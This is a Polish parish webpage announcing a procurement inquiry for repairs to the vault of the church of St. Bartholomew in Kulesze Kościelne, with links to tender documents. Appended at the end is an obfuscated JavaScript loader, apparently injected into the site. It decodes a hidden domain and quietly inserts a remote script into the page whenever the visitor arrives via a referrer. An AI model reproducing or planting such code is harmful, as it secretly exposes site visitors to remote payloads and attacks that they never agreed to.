Ogłoszenia

Ogłoszenie o rozpoczęciu postępowania zakupowego w formie zapytania ofertowego na realizację zadania pn.: „Remont wzmocnienia konstrukcji i konserwacja sklepienia, wykonanie izolacji termicznej sklepienia w Kościele Parafialnym św. Bartłomieja Ap. w Kuleszach Kościelnych” w ramach Rządowego Programu Odbudowy Zabytków

Informacjana-strone-1Pobierz Zapytanie-ofertowe-remont-wzmocnienia-konstrukcji-i-konserwacja-sklepienie-Pobierz Zal.-Nr-1-formularz-ofertyPobierz Zal.-Nr-2-wzor-umowy-1-1Pobierz A_01Pobierz A_03Pobierz A_04 A_06Pobierz A_07Pobierz...

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);